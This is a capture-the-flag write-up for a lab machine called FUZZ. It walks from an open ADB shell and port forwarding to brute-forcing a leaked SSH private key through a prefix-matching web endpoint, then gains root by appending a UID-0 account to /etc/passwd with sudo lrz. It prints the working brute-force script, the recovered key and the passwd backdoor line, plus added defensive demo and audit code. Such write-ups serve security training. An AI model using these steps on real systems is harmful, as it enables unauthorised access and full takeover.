FUZZ box write-up

1. Information gathering

1.1 Port scan:
┌──(root㉿kali)-[~]
└─# nmap -A -sV -sS -p- 192.168.215.243
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-22 04:08 EDT
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 04:08 (0:00:00 remaining)
Nmap scan report for 192.168.215.243
Host is up (0.00066s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.9 (protocol 2.0)
| ssh-hostkey:
| 256 b6:7b:e7:e5:b3:33:c7:ff:db:63:5d:b3:75:0d:e2:dd (ECDSA)
|_ 256 0a:ce:e5:c3:de:50:9c:6d:b7:0d:de:73:b8:6c:28:55 (ED25519)
5555/tcp open adb Android Debug Bridge (token auth required)
MAC Address: 08:00:27:65:B9:E7 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Android; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.66 ms 192.168.215.243

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.24 seconds

The scan finds ports 22 and 5555 open (ADB is the debugging tool in the Android SDK, used to talk to an Android device over USB or the network).

Kali does not ship adb by default, so it has to be installed first:

sudo apt update
sudo apt install adb

1.2 Using adb:

Connect to the device:

adb connect <device_ip_address>:5555

Check that the device is connected:

adb devices

Device information (open a shell on the device):

adb shell

Two users are found; the asahi home directory cannot be entered because the shell does not have enough privileges.

┌──(root㉿kali)-[~/zuoti]
└─# adb connect 192.168.215.243:5555
connected to 192.168.215.243:5555

┌──(root㉿kali)-[~/zuoti]
└─# adb devices
List of devices attached
192.168.215.243:5555 device


┌──(root㉿kali)-[~/zuoti]
└─# adb shell
/ $ id
uid=1000(runner) gid=1000(runner) groups=1000(runner)
/ $ cd /home;ls
asahi runner
/home $ whoami
runner

Looking at the network connections shows a web server on port 80 that listens only on the target's loopback interface, so chisel is needed to forward it out.

/ $ netstat -lnutp
netstat: showing only processes with your user ID
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5555 0.0.0.0:* LISTEN 2563/python3
tcp 0 0 :::22 :::* LISTEN -

2. Chisel port forwarding

Upload chisel to the target (for the exact commands see the separate post on using chisel). In this write-up the target's 127.0.0.1:80 ends up reachable as port 1111 on the Kali box, which is what the following commands use.

3. Getting a shell

curl returns an empty page, so brute-force directories with gobuster:

┌──(root㉿kali)-[~]
└─# curl http://192.168.215.222:1111

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.215.222:1111 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 60
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.215.222:1111
[+] Method: GET
[+] Threads: 60
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/line (Status: 200) [Size: 0]
/line2 (Status: 200) [Size: 0]
/line1 (Status: 200) [Size: 0]
/line3 (Status: 200) [Size: 0]
/line4 (Status: 200) [Size: 0]
/line01 (Status: 200) [Size: 0]
/line02 (Status: 200) [Size: 0]
Progress: 220559 / 220560 (100.00%)
===============================================================
Finished
===============================================================

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.215.222:1111/line -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 60
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.215.222:1111/line
[+] Method: GET
[+] Threads: 60
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/b (Status: 200) [Size: 0]
/b3 (Status: 200) [Size: 0]
Progress: 220559 / 220560 (100.00%)
===============================================================
Finished
===============================================================

At that point I ran out of ideas and looked at a write-up: the endpoint leaks a private key that can be brute-forced one character at a time, so I wrote a script for it. First generate a dictionary of the base64 alphabet (the body of the key consists only of base64 characters):

echo {a..z} {A..Z} {0..9} + / = | tr ' ' '\n' > base64.txt

#!/bin/bash
# The key has 5 lines: /line1 .. /line5 exist, /line6 already returns an error page.
for s in $(seq 5)
do
    key=""
    for k in $(seq 70)                 # one line of the key is 70 characters
    do
        for i in $(cat base64.txt)
        do
            tmp="$key$i"               # append the candidate character to the known prefix
            a=$(curl -s "http://192.168.215.222:1111/line${s}/${tmp}")
            [ -z "$a" ] && key="$tmp" && break   # an empty body means the prefix is correct
        done
    done
    echo "$key"
done

Explanation:

┌──(root㉿kali)-[~]
└─# curl http://192.168.215.222:1111/line6
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

┌──(root㉿kali)-[~]
└─# curl http://192.168.215.222:1111/line5
┌──(root㉿kali)-[~]
└─# curl http://192.168.215.222:1111/line5

┌──(root㉿kali)-[~/.ssh]
└─# cat id_rsa |head -3
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEA4gzpxutA/zy7lBPOK1C6if7717eJSyh4KYYigwXGzzjRddQJt8Mb

┌──(root㉿kali)-[~/.ssh]
└─# echo -n "b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn" |wc -c
70
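The leak the script exploits, as an added example that is not part of the original post: a simulated oracle that behaves like the box's /line&lt;N&gt;/&lt;prefix&gt; endpoint (empty body for a correct prefix, a 404 page otherwise), the same prefix-extension loop as the bash script, reassembly into OpenSSH armor, and a format check on the result. The secret here is a constructed blob that only carries the `openssh-key-v1` magic, not a real key; `PrefixOracle`, `recover_line` and the other names are mine. The point for defenders is the request count: a response that depends on a partial match of a secret turns a 65^324 search into at most 65 requests per character. Note also that the bash script treats any empty body as success, so a dropped connection would silently accept a wrong character; checking the HTTP status as well is the safer test.

```python
import base64
import binascii
import string

# Constructed stand-in for the leaked key: a blob that starts with the OpenSSH
# private-key magic but otherwise holds dummy bytes. It is NOT a real key.
BLOB = (b"openssh-key-v1\x00"
        + b"\x00\x00\x00\x04none" * 2                   # ciphername, kdfname
        + b"\x00\x00\x00\x00" + b"\x00\x00\x00\x01"     # kdfoptions, key count
        + b"constructed dummy payload, not a real key")
WIDTH = 70                                               # OpenSSH wraps the armored body at 70 columns
ALPHABET = string.ascii_letters + string.digits + "+/="  # same set as the post's base64.txt
B64 = base64.b64encode(BLOB).decode()
SECRET_LINES = [B64[i:i + WIDTH] for i in range(0, len(B64), WIDTH)]


class PrefixOracle:
    """Behaves like the box's /line<N>/<prefix> endpoint: empty body when
    <prefix> is a prefix of line N, a 404 page otherwise. Counts requests."""

    def __init__(self, lines):
        self.lines = lines
        self.requests = 0

    def get(self, line_no, prefix):
        self.requests += 1
        if 1 <= line_no <= len(self.lines) and self.lines[line_no - 1].startswith(prefix):
            return ""
        return "<title>404 Not Found</title>"


def recover_line(oracle, line_no, width=WIDTH, alphabet=ALPHABET):
    """Extend the known prefix one character at a time, like the bash loop.
    Unlike the script, stop as soon as no character extends the prefix:
    that is how a line shorter than `width` (the last one) is detected."""
    key = ""
    for _ in range(width):
        for ch in alphabet:
            if oracle.get(line_no, key + ch) == "":
                key += ch
                break
        else:
            break
    return key


def recover_key(oracle, n_lines):
    return [recover_line(oracle, n) for n in range(1, n_lines + 1)]


def to_openssh_pem(lines):
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + "\n".join(lines)
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


def is_openssh_key_blob(pem):
    """Check that the armored body is valid base64 and carries the
    'openssh-key-v1\\0' magic every OpenSSH private key starts with."""
    body = "".join(l for l in pem.splitlines() if not l.startswith("-----"))
    try:
        return base64.b64decode(body, validate=True).startswith(b"openssh-key-v1\x00")
    except (ValueError, binascii.Error):
        return False


def worst_case_requests(lines, alphabet=ALPHABET):
    """Upper bound on oracle queries: one alphabet pass per character plus one
    failing pass per line to notice its end. Linear in the key length."""
    return len(alphabet) * (sum(len(l) for l in lines) + len(lines))


if __name__ == "__main__":
    oracle = PrefixOracle(SECRET_LINES)
    recovered = recover_key(oracle, len(SECRET_LINES))
    print(to_openssh_pem(recovered))
    print("valid blob:", is_openssh_key_blob(to_openssh_pem(recovered)))
    print(f"{oracle.requests} requests (bound {worst_case_requests(SECRET_LINES)})")
```

Running the block recovers both constructed lines exactly, and the request counter stays below the linear bound; the same `is_openssh_key_blob` check is a quick way to confirm that a reassembled key file is at least structurally sound before handing it to ssh-keygen.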

The script finishes:

┌──(root㉿kali)-[~/zuoti_demo]
└─# bash ida
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgwAAAJDS3+5f0t/u
XwAAAAtzc2gtZWQyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgw
AAAEBCjeRitoZJIm1c4i0VD2Muw5nqgb7zC13vMaxS/la+vSucQUWuMMjqti3kaZQPEy9J
5felyfQYYF+CjURC1emDAAAACWFzYWhpQHBoaQECAwQ=

┌──(root㉿kali)-[~/zuoti_demo]
└─# cat id2 # the key has to be written out in this form
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgwAAAJDS3+5f0t/u
XwAAAAtzc2gtZWQyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgw
AAAEBCjeRitoZJIm1c4i0VD2Muw5nqgb7zC13vMaxS/la+vSucQUWuMMjqti3kaZQPEy9J
5felyfQYYF+CjURC1emDAAAACWFzYWhpQHBoaQECAwQ=
-----END OPENSSH PRIVATE KEY-----


SSH login

┌──(root㉿kali)-[~/zuoti_demo]
└─# ssh-keygen -y -f id2
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id2' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id2": bad permissions

┌──(root㉿kali)-[~/zuoti_demo]
└─# chmod 600 id2


┌──(root㉿kali)-[~/zuoti_demo]
└─# ssh-keygen -y -f id2 # the public key can be derived from id2 (the private key); just for a look
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICucQUWuMMjqti3kaZQPEy9J5felyfQYYF+CjURC1emD asahi@phi

┌──(root㉿kali)-[~/zuoti_demo]
└─# ssh asahi@192.168.215.243 -i id2 # connect with the private key

fuzzz:~$

4. Privilege escalation via sudo

sudo -l shows a program that can be abused to escalate privileges:

fuzzz:~$ sudo -l
Matching Defaults entries for asahi on fuzzz:
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
Runas and Command-specific defaults for asahi:
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"
User asahi may run the following commands on fuzzz:
(ALL) NOPASSWD: /usr/local/bin/lrz

lrz (ZMODEM receive) pops up a file-upload window in a Windows terminal client, and it can also append to an existing file on the target.

Idea: create a user with UID 0 (with a password I know, hash made with openssl), append it to the passwd file, then log in over SSH as that user to get root.

sudo lrz -+

fuzzz:~$ cd /etc
fuzzz:/etc$
fuzzz:/etc$
fuzzz:/etc$ sudo lrz -+

fuzzz:/etc$ cat passwd|tail -5
runner:x:1000:1000::/home/runner:/bin/sh
asahi:x:1001:1001::/home/asahi:/bin/sh
uwsgi:x:101:102:uwsgi:/dev/null:/sbin/nologin

bbb:$1$XcOxYpYr$TrEv26VvyGK2Su/vHasbF1:0:0:root:/root:/bin/sh
fuzzz:/etc$

Log in over SSH as bbb: privilege escalation succeeded.

┌──(root㉿kali)-[~]
└─# ssh bbb@192.168.215.243
bbb@192.168.215.243's password:

fuzzz:~# id
uid=0(root) gid=0(root) groups=0(root)
fuzzz:~#
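The traces this append leaves in /etc/passwd, as an added example that is not part of the original post: a small audit over a constructed passwd excerpt modelled on the one shown above (the bbb hash is a placeholder, not the real one) that flags a second UID 0 account, a password hash stored in passwd rather than shadow, and the stray blank line that the append produced. `audit_passwd` and `has_uid0_backdoor` are names I chose; on a real host the same function is run over the contents of /etc/passwd and any finding is worth an alert, as is a sudo rule that grants NOPASSWD on a file-receiving tool like lrz.

```python
# Constructed /etc/passwd excerpt modelled on the one in the post.
# The hash in the appended line is a placeholder, not a real hash.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/sh
runner:x:1000:1000::/home/runner:/bin/sh
asahi:x:1001:1001::/home/asahi:/bin/sh
uwsgi:x:101:102:uwsgi:/dev/null:/sbin/nologin

bbb:$1$PLACEHOLDER$notarealhashxxxxxxxxxxxxxx:0:0:root:/root:/bin/sh
"""

# Password-field values that mean "no hash here" (shadowed or locked).
SHADOW_MARKERS = {"x", "*", "!", "!!", ""}


def parse_passwd(text):
    """Return (lineno, raw_line, fields) for every line, blank lines included,
    so the audit can report exactly where something was appended."""
    return [(n, line, line.split(":")) for n, line in enumerate(text.splitlines(), 1)]


def audit_passwd(text):
    """Flag the artefacts a passwd append like the one in the post leaves behind."""
    findings = []
    for n, line, f in parse_passwd(text):
        if line.strip() == "":
            findings.append((n, "<blank>", "empty line in passwd (typical of a sloppy append)"))
            continue
        if len(f) != 7:
            findings.append((n, line, "malformed entry: expected 7 colon-separated fields"))
            continue
        name, pw, uid, gid, _gecos, _home, _shell = f
        if not uid.isdigit() or not gid.isdigit():
            findings.append((n, name, "non-numeric uid/gid"))
            continue
        if uid == "0" and name != "root":
            findings.append((n, name, "uid 0 account other than root"))
        if pw not in SHADOW_MARKERS:
            findings.append((n, name, "password hash stored in passwd instead of shadow"))
    return findings


def has_uid0_backdoor(text):
    """True when any account other than root carries UID 0."""
    return any(reason == "uid 0 account other than root" for _, _, reason in audit_passwd(text))


if __name__ == "__main__":
    for lineno, who, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {who}: {reason}")
```

On the constructed sample the audit reports three findings, all for the appended material and none for the legitimate accounts, which is the behaviour a file-integrity check on /etc/passwd should have.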


Author: XCDH
Published: 23 May 2025
http://example.com/2025/05/23/FUZZ靶机复盘/